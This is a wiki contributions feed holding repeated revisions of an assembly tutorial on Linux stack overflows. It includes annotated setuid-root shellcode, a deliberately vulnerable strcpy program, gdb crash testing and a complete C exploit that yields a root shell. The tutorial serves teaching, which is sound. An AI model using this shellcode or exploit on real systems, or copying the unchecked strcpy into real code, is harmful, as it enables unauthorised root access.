https://wiki.skullsecurity.org/api.php?action=feedcontributions&user=Killboy&feedformat=atomSkullSecurity - User contributions [en]2024-03-29T14:51:10ZUser contributionsMediaWiki 1.36.1https://wiki.skullsecurity.org/index.php?title=Example_4&diff=3167Example 42012-01-20T04:43:11Z<p>Killboy: /* Local Exploits */</p>
<hr />
<div>{{Infobox assembly}}<br />
[[Category: Assembly Examples]]<br />
<br />
This is the first practical example here, and I thought it appropriate to use something that not only illustrates the concept of machine code, but also involves something I'm very interested in: security. <br />
<br />
This example will demonstrate a stack overflow vulnerability. <br />
<br />
This example will be done on Linux, with gcc. Windows does funny things to the stack that I don't really want to explain, and exploiting a vulnerability on Windows is trickier. <br />
<br />
For more information on stack overflows, have a look at the paper [http://insecure.org/stf/smashstack.html Smashing the Stack for Fun and Profit] by Aleph One. <br />
<br />
== Local Exploits ==<br />
If you haven't done any real research on vulnerabilities and exploits, that's fine. This section will briefly cover what you need to know. <br />
<br />
Some programs on Linux run with root, or superuser privilege. For example, programs that need access to the /etc/shadow file require root access, since the shadow file is inaccessible to normal users. If a user can take control of these programs and have the program run a shell, the shell will run as the same user as the program, which is root. From there, the attacker can run whichever program he chooses with root access, which means he has full control of the system. <br />
<br />
So the steps are:<br />
* Find a SetUID program (ie, a program that runs as root)<br />
* Find a vulnerability in the program<br />
* Exploit it<br />
<br />
The way to exploit the vulnerability is to trick the program into running arbitrary machine code, supplied by the attacker. The machine code, of course, represents assembly instructions. This machine code is called "shellcode", because it traditionally spawns a shell for the attacker.<br />
<br />
== Shellcode ==<br />
Here is some standard shellcode, with annotations. I won't explain what this does, because you should know how every line works, by now. The only tricky part is the Linux system call, which is explained in the comments:<br />
<pre><br />
;;;;;;;;<br />
; Name: shellcode.asm<br />
; Author: Jon Erickson<br />
; Date: March 24, 2005<br />
; To compile: nasm shellcode.asm<br />
; Requires: nasm <http://nasm.sourceforge.net><br />
;<br />
; Purpose: This is similar to shellcode.asm except that it<br />
; uses more condensed code and some tricks like xor'ing a<br />
; variable with itself to eliminate null (00) bytes, which<br />
; allows it to be stored in an ordinary string.<br />
;;;;;;;;<br />
BITS 32<br />
<br />
; setreuid(uid_t ruit, uid_t euid)<br />
xor eax, eax ; First eax must be 0 for the next instruction<br />
mov al, 70 ; Put 70 into eax, since setreuid is syscall #70<br />
xor ebx, ebx ; Put 0 into ebx, to set the real uid to root<br />
xor ecx, ecx ; Put 0 into ecx, to set the effective uid to root<br />
int 0x80 ; Call the kernel to make the system call happen<br />
<br />
jmp short two ; jump down to the bottom to get the address of "/bin/sh"<br />
one:<br />
pop ebx ; pop the "return address" from the stack<br />
; to put the address of the string into ebx<br />
; execve(const char *filename, char *const argv [], char *const envp[])<br />
xor eax, eax ; Clear eax<br />
mov [ebx+7], al ; Put the 0 from eax after the "/bin/sh"<br />
mov [ebx+8], ebx ; Put the address of the string from ebx here<br />
mov [ebx+12], eax ; Put null here<br />
<br />
mov al, 11 ; execve is syscall #11<br />
lea ecx, [ebx+8] ; Load the address that points to /bin/sh<br />
lea edx, [ebx+12] ; Load the address where we put null<br />
int 0x80 ; Call the kernel to make the system call happen<br />
<br />
two:<br />
call one ; Use a call to get back to the top to get this<br />
; address<br />
db '/bin/sh'<br />
</pre><br />
This code can be assembled with nasm, to produce the following machine code:<br />
<pre><br />
ron@slayer:~$ nasm shellcode.asm<br />
ron@slayer:~$ hexdump -C shellcode<br />
00000000 31 c0 b0 46 31 db 31 c9 cd 80 eb 16 5b 31 c0 88 |1À°F1Û1ÉÍ.ë.[1À.|<br />
00000010 43 07 89 5b 08 89 43 0c b0 0b 8d 4b 08 8d 53 0c |C..[..C.°..K..S.|<br />
00000020 cd 80 e8 e5 ff ff ff 2f 62 69 6e 2f 73 68 |Í.èåÿÿÿ/bin/sh|<br />
</pre><br />
<br />
Note that there isn't a single '00' byte. This is intentional, because shellcode is often stored in a string, and '00', or '\0', terminates strings. <br />
<br />
When this machine code runs, it attempts to spawn /bin/sh as root. This shellcode can be changed to any assembly (provided there are no 00 bytes). A common modification is changing the exploit to open a network port and listen for connections, or to connect back to the attacker. That behaviour is, obviously, used in network-based attacks.<br />
<br />
== Reminder: the Stack ==<br />
<br />
If you don't remember how the stack works, go back and re-read the section on the stack. <br />
<br />
Remember that the stack for a function looks like this, from bottom to top:<br />
* ... used by calling function ...<br />
* parameters<br />
* return address<br />
* local variables<br />
* saved registers<br />
* ...unallocated...<br />
<br />
Remember also that arrays are simply a sequence of bytes stored somewhere. In the case of local variables, the array is stored on the stack. <br />
<br />
Because an array operation is simply a memory access converted to assembly, a program doesn't actually know how long the array is. All it knows is what the programmer told it to do. If the programmer says it's ok to copy 100 bytes into an array, then the array is, presumably, at least 100 bytes long. <br />
<br />
Sometimes, a program forgets to check how much data the program can copy, which allows an attacker to provide too much data. The program, not knowing any better, copies the data past the end of the array, over other local variables. If it goes far enough, the return address may be overwritten. If the attacker can control the return address, then the return address can be pointed at the shellcode. Then when the "ret" instruction is issued, and ret pops off the return address to jump to, it instead gets the address of the shellcode! <br />
<br />
In other words, the return address is overwritten with the address of the shellcode, so when the function returns the shellcode runs.<br />
<br />
== The Vulnerable Program ==<br />
Here is a vulnerable program I wrote several years ago, for a paper (except that I fixed a couple spelling mistakes and changed the array size). It's extremely simple, and is only meant as a demonstration:<br />
<pre><br />
/**<br />
* Name: StackVuln.c<br />
* Author: Ron Bowes<br />
* Date: March 24, 2004<br />
* To compile: gcc StackVuln.c -o StackVuln<br />
* Requires: n/a<br />
*<br />
* Purpose: This code is vulnerable to a stack overflow if more than<br />
* 20 characters are entered. The exploit for it was written by<br />
* Jon Erickson in Hacking: Art of exploitation, but I wrote<br />
* this vulnerable code independently.<br />
*/<br />
#include <stdio.h><br />
#include <string.h><br />
int main(int argc, char *argv[])<br />
{<br />
char string[40];<br />
strcpy(string, argv[1]);<br />
printf("The message was: %s\n", string);<br />
printf("Program completed normally!\n\n");<br />
return 0;<br />
}<br />
</pre><br />
<br />
== Some Testing ==<br />
First, the program is compiled and tested with normal data:<br />
<pre><br />
ron@slayer:~$ gcc StackVuln.c -o StackVuln<br />
ron@slayer:~$ ./StackVuln "This is a test"<br />
The message was: This is a test<br />
Program completed normally!<br />
</pre><br />
<br />
Now we'll try it with progressively longer strings, in the ''gdb'' debugger, starting at 40 characters, then 50, 60. At 60, an "illegal instruction" occurs, which means we're close. Adding 4 more causes the crash we want:<br />
<pre><br />
ron@slayer:~$ gdb StackVuln<br />
(gdb) run 1234567890123456789012345678901234567890<br />
Starting program: /home/ron/StackVuln 1234567890123456789012345678901234567890<br />
The message was: 1234567890123456789012345678901234567890<br />
Program completed normally!<br />
Program exited normally.<br />
<br />
(gdb) run 12345678901234567890123456789012345678901234567890<br />
Starting program: /home/ron/StackVuln 12345678901234567890123456789012345678901234567890<br />
The message was: 12345678901234567890123456789012345678901234567890<br />
Program completed normally!<br />
Program exited normally.<br />
<br />
(gdb) run 123456789012345678901234567890123456789012345678900123456789<br />
Starting program: /home/ron/StackVuln 123456789012345678901234567890123456789012345678900123456789<br />
The message was: 123456789012345678901234567890123456789012345678900123456789<br />
Program completed normally!<br />
<br />
Program received signal SIGILL, Illegal instruction.<br />
0xb7ed3f00 in __libc_start_main () from /lib/tls/libc.so.6<br />
<br />
(gdb) run 1234567890123456789012345678901234567890123456789001234567890123<br />
Starting program: /home/ron/StackVuln 1234567890123456789012345678901234567890123456789001234567890123<br />
The message was: 1234567890123456789012345678901234567890123456789001234567890123<br />
Program completed normally!<br />
<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x33323130 in ?? ()<br />
</pre><br />
Note the address that it crashed at: 0x38373635. Remembering ascii, we know that 0x33 is '3', 0x32 is '2', 0x31 is '1', and 0x30 is '0'. That means that the return address was overwritten by the 0123. This theory can be tested by changing those characters to AAAA ('A' is 0x41, so the return address will likely be 0x41414141):<br />
<pre><br />
Starting program: /home/ron/StackVuln 123456789012345678901234567890123456789012345678900123456789AAAA<br />
The message was: 123456789012345678901234567890123456789012345678900123456789AAAA<br />
Program completed normally!<br />
<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x41414141 in ?? ()<br />
</pre><br />
The expected result is confirmed! <br />
<br />
== The Exploit ==<br />
<br />
To make this work well, I removed the display line from the program. Printing the shellcode to the terminal made things ugly. <br />
<br />
While I used my old code for the vulnerable program, I re-wrote the exploit from scratch to make it simpler, so that it doesn't require a nop-slide (See below). Here is the program that exploits the vulnerable program above, with comments:<br />
<pre><br />
/**<br />
* Name: Stackexploit.c<br />
* Author: Ronald Bowes<br />
* Date: March 13, 2007<br />
* To compile: gcc Stackexploit.c -o Stackexploit<br />
* Requires: The vulnerable program, called "StackVuln"<br />
*<br />
* Purpose: This code, originally from Hacking: Art of exploitation,<br />
* exploits a program with a stack overflow in a 40 character buffer<br />
* by writing 64 characters to it.<br />
*/<br />
#include <stdlib.h><br />
#include <string.h><br />
#include <unistd.h><br />
<br />
int main(int argc, char *argv[])<br />
{<br />
/* This string simulates the string in the vulnerable application. As long<br />
* as this program is called with the same commandline arguments, this string<br />
* will be in the same position in memory, which lets us set the return addres<br />
* in the target program. */<br />
char string[40];<br />
<br />
/* Here is the shellcode. The XXXX at the end will be overwritten by the address<br />
* of "string" */<br />
char exploit[] =<br />
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80" /* 1 - 10 */<br />
"\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b" /* 11 - 20 */<br />
"\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" /* 21 - 30 */<br />
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f" /* 31 - 40 */<br />
"\x62\x69\x6e\x2f\x73\x68\x90\x90\x90\x90" /* 41 - 50 */<br />
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" /* 51 - 60 */<br />
"XXXX"; /* 61 - 64 */<br />
<br />
/* These two lines cause the program to execute itself the same way<br />
* the vulnerable program will be executed. This ensures that the stack<br />
* is set up identicly, so the "string" declared here will have the same<br />
* address as the "string" in the vulnerable program. */<br />
if(argc < 2)<br />
execl(argv[0], "StackVuln", exploit, 0);<br />
<br />
/* Overwrite the XXXX with the address that's being jumped to. This is the address<br />
* of our simulated variable. */<br />
*((int*)(exploit + 60)) = &string;<br />
<br />
/* Finally, ow call the program with our exploit as the argument */<br />
execl("./StackVuln", "StackVuln", exploit, 0);<br />
<br />
return 0;<br />
}<br />
</pre><br />
<br />
Here, the vulnerable program is set to be SetUID (ie, run as root), and is run with the exploit program:<br />
<pre><br />
ron@slayer:~$ sudo chown root.root StackVuln<br />
ron@slayer:~$ sudo chmod +s StackVuln<br />
ron@slayer:~$ ls -l StackExploit StackVuln<br />
-rwxr-xr-x 1 ron users 11180 2007-03-14 13:46 StackExploit*<br />
-rwsr-sr-x 1 root root 11132 2007-03-14 13:36 StackVuln*<br />
ron@slayer:~$ ./StackExploit<br />
Program completed normally!<br />
<br />
sh-2.05b# whoami<br />
root<br />
</pre><br />
<br />
== nop Slide ==<br />
This section isn't necessary to assembly, but if you're curious about this exploit and ones like it, this is for you. <br />
<br />
In most cases, the attacker doesn't have the benefit of being able to simulate the stack of the original program, which makes it impossible to know where to jump. In those cases, the jump is often a guess, which may or may not be right. <br />
<br />
To avoid the requirement for pin-point accuracy, as many nop instructions as possible are commonly put in front of the shellcode. These nops, known as a nop-slide, give the attacker a bigger target to return to. Instead of having to return to a specific address, the return address need only be one of the nop instructions. If any nop instruction is hit, it runs, doing nothing, the next one runs, also doing nothing, and so on. Eventually, after the nops have all run, the shellcode is run as before. <br />
<br />
nop sleds are very common in exploits, unless the return address is in a predictable location.<br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Example_4&diff=3166Example 42012-01-20T04:35:37Z<p>Killboy: /* Shellcode */</p>
<hr />
<div>{{Infobox assembly}}<br />
[[Category: Assembly Examples]]<br />
<br />
This is the first practical example here, and I thought it appropriate to use something that not only illustrates the concept of machine code, but also involves something I'm very interested in: security. <br />
<br />
This example will demonstrate a stack overflow vulnerability. <br />
<br />
This example will be done on Linux, with gcc. Windows does funny things to the stack that I don't really want to explain, and exploiting a vulnerability on Windows is trickier. <br />
<br />
For more information on stack overflows, have a look at the paper [http://insecure.org/stf/smashstack.html Smashing the Stack for Fun and Profit] by Aleph One. <br />
<br />
== Local Exploits ==<br />
If you haven't done any real research on vulnerabilities and exploits, that's fine. This section will briefly cover what you need to know. <br />
<br />
Some programs on Linux run with root, or superuser privilege. Programs that, for example, need access to the password file require root access, since the password file is unreadable by a usual user. If a user can take control of these programs, and have the program run a shell. The shell will run as the same user as the program, which is root. From there, the attacker can run whichever program he chooses with root access, which means he has full control of the system. <br />
<br />
So the steps are:<br />
* Find a SetUID program (ie, a program that runs as root)<br />
* Find a vulnerability in the program<br />
* Exploit it<br />
<br />
The way to exploit the vulnerability is to trick the program into running arbitrary machine code, supplied by the attacker. The machine code, of course, represents assembly instructions. This machine code is called "shellcode", because it traditionally spawns a shell for the attacker. <br />
<br />
== Shellcode ==<br />
Here is some standard shellcode, with annotations. I won't explain what this does, because you should know how every line works, by now. The only tricky part is the Linux system call, which is explained in the comments:<br />
<pre><br />
;;;;;;;;<br />
; Name: shellcode.asm<br />
; Author: Jon Erickson<br />
; Date: March 24, 2005<br />
; To compile: nasm shellcode.asm<br />
; Requires: nasm <http://nasm.sourceforge.net><br />
;<br />
; Purpose: This is similar to shellcode.asm except that it<br />
; uses more condensed code and some tricks like xor'ing a<br />
; variable with itself to eliminate null (00) bytes, which<br />
; allows it to be stored in an ordinary string.<br />
;;;;;;;;<br />
BITS 32<br />
<br />
; setreuid(uid_t ruit, uid_t euid)<br />
xor eax, eax ; First eax must be 0 for the next instruction<br />
mov al, 70 ; Put 70 into eax, since setreuid is syscall #70<br />
xor ebx, ebx ; Put 0 into ebx, to set the real uid to root<br />
xor ecx, ecx ; Put 0 into ecx, to set the effective uid to root<br />
int 0x80 ; Call the kernel to make the system call happen<br />
<br />
jmp short two ; jump down to the bottom to get the address of "/bin/sh"<br />
one:<br />
pop ebx ; pop the "return address" from the stack<br />
; to put the address of the string into ebx<br />
; execve(const char *filename, char *const argv [], char *const envp[])<br />
xor eax, eax ; Clear eax<br />
mov [ebx+7], al ; Put the 0 from eax after the "/bin/sh"<br />
mov [ebx+8], ebx ; Put the address of the string from ebx here<br />
mov [ebx+12], eax ; Put null here<br />
<br />
mov al, 11 ; execve is syscall #11<br />
lea ecx, [ebx+8] ; Load the address that points to /bin/sh<br />
lea edx, [ebx+12] ; Load the address where we put null<br />
int 0x80 ; Call the kernel to make the system call happen<br />
<br />
two:<br />
call one ; Use a call to get back to the top to get this<br />
; address<br />
db '/bin/sh'<br />
</pre><br />
This code can be assembled with nasm, to produce the following machine code:<br />
<pre><br />
ron@slayer:~$ nasm shellcode.asm<br />
ron@slayer:~$ hexdump -C shellcode<br />
00000000 31 c0 b0 46 31 db 31 c9 cd 80 eb 16 5b 31 c0 88 |1À°F1Û1ÉÍ.ë.[1À.|<br />
00000010 43 07 89 5b 08 89 43 0c b0 0b 8d 4b 08 8d 53 0c |C..[..C.°..K..S.|<br />
00000020 cd 80 e8 e5 ff ff ff 2f 62 69 6e 2f 73 68 |Í.èåÿÿÿ/bin/sh|<br />
</pre><br />
<br />
Note that there isn't a single '00' byte. This is intentional, because shellcode is often stored in a string, and '00', or '\0', terminates strings. <br />
<br />
When this machine code runs, it attempts to spawn /bin/sh as root. This shellcode can be changed to any assembly (provided there are no 00 bytes). A common modification is changing the exploit to open a network port and listen for connections, or to connect back to the attacker. That behaviour is, obviously, used in network-based attacks.<br />
<br />
== Reminder: the Stack ==<br />
<br />
If you don't remember how the stack works, go back and re-read the section on the stack. <br />
<br />
Remember that the stack for a function looks like this, from bottom to top:<br />
* ... used by calling function ...<br />
* parameters<br />
* return address<br />
* local variables<br />
* saved registers<br />
* ...unallocated...<br />
<br />
Remember also that arrays are simply a sequence of bytes stored somewhere. In the case of local variables, the array is stored on the stack. <br />
<br />
Because an array operation is simply a memory access converted to assembly, a program doesn't actually know how long the array is. All it knows is what the programmer told it to do. If the programmer says it's ok to copy 100 bytes into an array, then the array is, presumably, at least 100 bytes long. <br />
<br />
Sometimes, a program forgets to check how much data the program can copy, which allows an attacker to provide too much data. The program, not knowing any better, copies the data past the end of the array, over other local variables. If it goes far enough, the return address may be overwritten. If the attacker can control the return address, then the return address can be pointed at the shellcode. Then when the "ret" instruction is issued, and ret pops off the return address to jump to, it instead gets the address of the shellcode! <br />
<br />
In other words, the return address is overwritten with the address of the shellcode, so when the function returns the shellcode runs.<br />
<br />
== The Vulnerable Program ==<br />
Here is a vulnerable program I wrote several years ago, for a paper (except that I fixed a couple spelling mistakes and changed the array size). It's extremely simple, and is only meant as a demonstration:<br />
<pre><br />
/**<br />
* Name: StackVuln.c<br />
* Author: Ron Bowes<br />
* Date: March 24, 2004<br />
* To compile: gcc StackVuln.c -o StackVuln<br />
* Requires: n/a<br />
*<br />
* Purpose: This code is vulnerable to a stack overflow if more than<br />
* 20 characters are entered. The exploit for it was written by<br />
* Jon Erickson in Hacking: Art of exploitation, but I wrote<br />
* this vulnerable code independently.<br />
*/<br />
#include <stdio.h><br />
#include <string.h><br />
int main(int argc, char *argv[])<br />
{<br />
char string[40];<br />
strcpy(string, argv[1]);<br />
printf("The message was: %s\n", string);<br />
printf("Program completed normally!\n\n");<br />
return 0;<br />
}<br />
</pre><br />
<br />
== Some Testing ==<br />
First, the program is compiled and tested with normal data:<br />
<pre><br />
ron@slayer:~$ gcc StackVuln.c -o StackVuln<br />
ron@slayer:~$ ./StackVuln "This is a test"<br />
The message was: This is a test<br />
Program completed normally!<br />
</pre><br />
<br />
Now we'll try it with progressively longer strings, in the ''gdb'' debugger, starting at 40 characters, then 50, 60. At 60, an "illegal instruction" occurs, which means we're close. Adding 4 more causes the crash we want:<br />
<pre><br />
ron@slayer:~$ gdb StackVuln<br />
(gdb) run 1234567890123456789012345678901234567890<br />
Starting program: /home/ron/StackVuln 1234567890123456789012345678901234567890<br />
The message was: 1234567890123456789012345678901234567890<br />
Program completed normally!<br />
Program exited normally.<br />
<br />
(gdb) run 12345678901234567890123456789012345678901234567890<br />
Starting program: /home/ron/StackVuln 12345678901234567890123456789012345678901234567890<br />
The message was: 12345678901234567890123456789012345678901234567890<br />
Program completed normally!<br />
Program exited normally.<br />
<br />
(gdb) run 123456789012345678901234567890123456789012345678900123456789<br />
Starting program: /home/ron/StackVuln 123456789012345678901234567890123456789012345678900123456789<br />
The message was: 123456789012345678901234567890123456789012345678900123456789<br />
Program completed normally!<br />
<br />
Program received signal SIGILL, Illegal instruction.<br />
0xb7ed3f00 in __libc_start_main () from /lib/tls/libc.so.6<br />
<br />
(gdb) run 1234567890123456789012345678901234567890123456789001234567890123<br />
Starting program: /home/ron/StackVuln 1234567890123456789012345678901234567890123456789001234567890123<br />
The message was: 1234567890123456789012345678901234567890123456789001234567890123<br />
Program completed normally!<br />
<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x33323130 in ?? ()<br />
</pre><br />
Note the address that it crashed at: 0x38373635. Remembering ascii, we know that 0x33 is '3', 0x32 is '2', 0x31 is '1', and 0x30 is '0'. That means that the return address was overwritten by the 0123. This theory can be tested by changing those characters to AAAA ('A' is 0x41, so the return address will likely be 0x41414141):<br />
<pre><br />
Starting program: /home/ron/StackVuln 123456789012345678901234567890123456789012345678900123456789AAAA<br />
The message was: 123456789012345678901234567890123456789012345678900123456789AAAA<br />
Program completed normally!<br />
<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x41414141 in ?? ()<br />
</pre><br />
The expected result is confirmed! <br />
<br />
== The Exploit ==<br />
<br />
To make this work well, I removed the display line from the program. Printing the shellcode to the terminal made things ugly. <br />
<br />
While I used my old code for the vulnerable program, I re-wrote the exploit from scratch to make it simpler, so that it doesn't require a nop-slide (See below). Here is the program that exploits the vulnerable program above, with comments:<br />
<pre><br />
/**<br />
* Name: Stackexploit.c<br />
* Author: Ronald Bowes<br />
* Date: March 13, 2007<br />
* To compile: gcc Stackexploit.c -o Stackexploit<br />
* Requires: The vulnerable program, called "StackVuln"<br />
*<br />
* Purpose: This code, originally from Hacking: Art of exploitation,<br />
* exploits a program with a stack overflow in a 40 character buffer<br />
* by writing 64 characters to it.<br />
*/<br />
#include <stdlib.h><br />
#include <string.h><br />
#include <unistd.h><br />
<br />
int main(int argc, char *argv[])<br />
{<br />
/* This string simulates the string in the vulnerable application. As long<br />
* as this program is called with the same commandline arguments, this string<br />
* will be in the same position in memory, which lets us set the return addres<br />
* in the target program. */<br />
char string[40];<br />
<br />
/* Here is the shellcode. The XXXX at the end will be overwritten by the address<br />
* of "string" */<br />
char exploit[] =<br />
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80" /* 1 - 10 */<br />
"\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b" /* 11 - 20 */<br />
"\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" /* 21 - 30 */<br />
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f" /* 31 - 40 */<br />
"\x62\x69\x6e\x2f\x73\x68\x90\x90\x90\x90" /* 41 - 50 */<br />
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" /* 51 - 60 */<br />
"XXXX"; /* 61 - 64 */<br />
<br />
/* These two lines cause the program to execute itself the same way<br />
* the vulnerable program will be executed. This ensures that the stack<br />
* is set up identicly, so the "string" declared here will have the same<br />
* address as the "string" in the vulnerable program. */<br />
if(argc < 2)<br />
execl(argv[0], "StackVuln", exploit, 0);<br />
<br />
/* Overwrite the XXXX with the address that's being jumped to. This is the address<br />
* of our simulated variable. */<br />
*((int*)(exploit + 60)) = &string;<br />
<br />
/* Finally, ow call the program with our exploit as the argument */<br />
execl("./StackVuln", "StackVuln", exploit, 0);<br />
<br />
return 0;<br />
}<br />
</pre><br />
<br />
Here, the vulnerable program is set to be SetUID (ie, run as root), and is run with the exploit program:<br />
<pre><br />
ron@slayer:~$ sudo chown root.root StackVuln<br />
ron@slayer:~$ sudo chmod +s StackVuln<br />
ron@slayer:~$ ls -l StackExploit StackVuln<br />
-rwxr-xr-x 1 ron users 11180 2007-03-14 13:46 StackExploit*<br />
-rwsr-sr-x 1 root root 11132 2007-03-14 13:36 StackVuln*<br />
ron@slayer:~$ ./StackExploit<br />
Program completed normally!<br />
<br />
sh-2.05b# whoami<br />
root<br />
</pre><br />
<br />
== nop Slide ==<br />
This section isn't necessary to assembly, but if you're curious about this exploit and ones like it, this is for you. <br />
<br />
In most cases, the attacker doesn't have the benefit of being able to simulate the stack of the original program, which makes it impossible to know where to jump. In those cases, the jump is often a guess, which may or may not be right. <br />
<br />
To avoid the requirement for pin-point accuracy, as many nop instructions as possible are commonly put in front of the shellcode. These nops, known as a nop-slide, give the attacker a bigger target to return to. Instead of having to return to a specific address, the return address need only be one of the nop instructions. If any nop instruction is hit, it runs, doing nothing, the next one runs, also doing nothing, and so on. Eventually, after the nops have all run, the shellcode is run as before. <br />
<br />
nop sleds are very common in exploits, unless the return address is in a predictable location.<br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Example_4&diff=3165Example 42012-01-20T04:34:50Z<p>Killboy: /* Shellcode */</p>
<hr />
<div>{{Infobox assembly}}<br />
[[Category: Assembly Examples]]<br />
<br />
This is the first practical example here, and I thought it appropriate to use something that not only illustrates the concept of machine code, but also involves something I'm very interested in: security. <br />
<br />
This example will demonstrate a stack overflow vulnerability. <br />
<br />
This example will be done on Linux, with gcc. Windows does funny things to the stack that I don't really want to explain, and exploiting a vulnerability on Windows is trickier. <br />
<br />
For more information on stack overflows, have a look at the paper [http://insecure.org/stf/smashstack.html Smashing the Stack for Fun and Profit] by Aleph One. <br />
<br />
== Local Exploits ==<br />
If you haven't done any real research on vulnerabilities and exploits, that's fine. This section will briefly cover what you need to know. <br />
<br />
Some programs on Linux run with root, or superuser privilege. Programs that, for example, need access to the password file require root access, since the password file is unreadable by a usual user. If a user can take control of these programs, and have the program run a shell. The shell will run as the same user as the program, which is root. From there, the attacker can run whichever program he chooses with root access, which means he has full control of the system. <br />
<br />
So the steps are:<br />
* Find a SetUID program (ie, a program that runs as root)<br />
* Find a vulnerability in the program<br />
* Exploit it<br />
<br />
The way to exploit the vulnerability is to trick the program into running arbitrary machine code, supplied by the attacker. The machine code, of course, represents assembly instructions. This machine code is called "shellcode", because it traditionally spawns a shell for the attacker. <br />
<br />
== Shellcode ==<br />
Here is some standard shellcode, with annotations. I won't explain what this does, because you should know how every line works, by now. The only tricky part is the Linux system call, which is explained in the comments:<br />
<pre><br />
;;;;;;;;<br />
; Name: shellcode.asm<br />
; Author: Jon Erickson<br />
; Date: March 24, 2005<br />
; To compile: nasm shellcode.asm<br />
; Requires: nasm <http://nasm.sourceforge.net><br />
;<br />
; Purpose: This is similar to shellcode.asm except that it<br />
; uses more condensed code and some tricks like xor'ing a<br />
; variable with itself to eliminate null (00) bytes, which<br />
; allows it to be stored in an ordinary string.<br />
;;;;;;;;<br />
BITS 32<br />
<br />
; setreuid(uid_t ruit, uid_t euid)<br />
xor eax, eax ; First eax must be 0 for the next instruction<br />
mov al, 70 ; Put 70 into eax, since setreuid is syscall #70<br />
xor ebx, ebx ; Put 0 into ebx, to set the real uid to root<br />
xor ecx, ecx ; Put 0 into ecx, to set the effective uid to root<br />
int 0x80 ; Call the kernel to make the system call happen<br />
<br />
jmp short two ; jump down to the bottom to get the address of "/bin/sh"<br />
one:<br />
pop ebx ; pop the "return address" from the stack<br />
; to put the address of the string into ebx<br />
; execve(const char *filename, char *const argv [], char *const envp[])<br />
xor eax, eax ; Clear eax<br />
mov [ebx+7], al ; Put the 0 from eax after the "/bin/sh"<br />
mov [ebx+8], ebx ; Put the address of the string from ebx here<br />
mov [ebx+12], eax ; Put null here<br />
<br />
mov al, 11 ; execve is syscall #11<br />
lea ecx, [ebx+8] ; Load the address that points to /bin/sh<br />
lea edx, [ebx+12] ; Load the address where we put null<br />
int 0x80 ; Call the kernel to make the system call happen<br />
<br />
two:<br />
call one ; Use a call to get back to the top to get this; address<br />
db '/bin/sh'<br />
</pre><br />
This code can be assembled with nasm, to produce the following machine code:<br />
<pre><br />
ron@slayer:~$ nasm shellcode.asm<br />
ron@slayer:~$ hexdump -C shellcode<br />
00000000 31 c0 b0 46 31 db 31 c9 cd 80 eb 16 5b 31 c0 88 |1À°F1Û1ÉÍ.ë.[1À.|<br />
00000010 43 07 89 5b 08 89 43 0c b0 0b 8d 4b 08 8d 53 0c |C..[..C.°..K..S.|<br />
00000020 cd 80 e8 e5 ff ff ff 2f 62 69 6e 2f 73 68 |Í.èåÿÿÿ/bin/sh|<br />
</pre><br />
<br />
Note that there isn't a single '00' byte. This is intentional, because shellcode is often stored in a string, and '00', or '\0', terminates strings. <br />
<br />
When this machine code runs, it attempts to spawn /bin/sh as root. This shellcode can be changed to any assembly (provided there are no 00 bytes). A common modification is changing the exploit to open a network port and listen for connections, or to connect back to the attacker. That behaviour is, obviously, used in network-based attacks.<br />
<br />
== Reminder: the Stack ==<br />
<br />
If you don't remember how the stack works, go back and re-read the section on the stack. <br />
<br />
Remember that the stack for a function looks like this, from bottom to top:<br />
* ... used by calling function ...<br />
* parameters<br />
* return address<br />
* local variables<br />
* saved registers<br />
* ...unallocated...<br />
<br />
Remember also that arrays are simply a sequence of bytes stored somewhere. In the case of local variables, the array is stored on the stack. <br />
<br />
Because an array operation is simply a memory access converted to assembly, a program doesn't actually know how long the array is. All it knows is what the programmer told it to do. If the programmer says it's ok to copy 100 bytes into an array, then the array is, presumably, at least 100 bytes long. <br />
<br />
Sometimes, a program forgets to check how much data the program can copy, which allows an attacker to provide too much data. The program, not knowing any better, copies the data past the end of the array, over other local variables. If it goes far enough, the return address may be overwritten. If the attacker can control the return address, then the return address can be pointed at the shellcode. Then when the "ret" instruction is issued, and ret pops off the return address to jump to, it instead gets the address of the shellcode! <br />
<br />
In other words, the return address is overwritten with the address of the shellcode, so when the function returns the shellcode runs.<br />
<br />
== The Vulnerable Program ==<br />
Here is a vulnerable program I wrote several years ago, for a paper (except that I fixed a couple spelling mistakes and changed the array size). It's extremely simple, and is only meant as a demonstration:<br />
<pre><br />
/**<br />
* Name: StackVuln.c<br />
* Author: Ron Bowes<br />
* Date: March 24, 2004<br />
* To compile: gcc StackVuln.c -o StackVuln<br />
* Requires: n/a<br />
*<br />
* Purpose: This code is vulnerable to a stack overflow if more than<br />
* 20 characters are entered. The exploit for it was written by<br />
* Jon Erickson in Hacking: Art of exploitation, but I wrote<br />
* this vulnerable code independently.<br />
*/<br />
#include <stdio.h><br />
#include <string.h><br />
int main(int argc, char *argv[])<br />
{<br />
char string[40];<br />
strcpy(string, argv[1]);<br />
printf("The message was: %s\n", string);<br />
printf("Program completed normally!\n\n");<br />
return 0;<br />
}<br />
</pre><br />
<br />
== Some Testing ==<br />
First, the program is compiled and tested with normal data:<br />
<pre><br />
ron@slayer:~$ gcc StackVuln.c -o StackVuln<br />
ron@slayer:~$ ./StackVuln "This is a test"<br />
The message was: This is a test<br />
Program completed normally!<br />
</pre><br />
<br />
Now we'll try it with progressively longer strings, in the ''gdb'' debugger, starting at 40 characters, then 50, 60. At 60, an "illegal instruction" occurs, which means we're close. Adding 4 more causes the crash we want:<br />
<pre><br />
ron@slayer:~$ gdb StackVuln<br />
(gdb) run 1234567890123456789012345678901234567890<br />
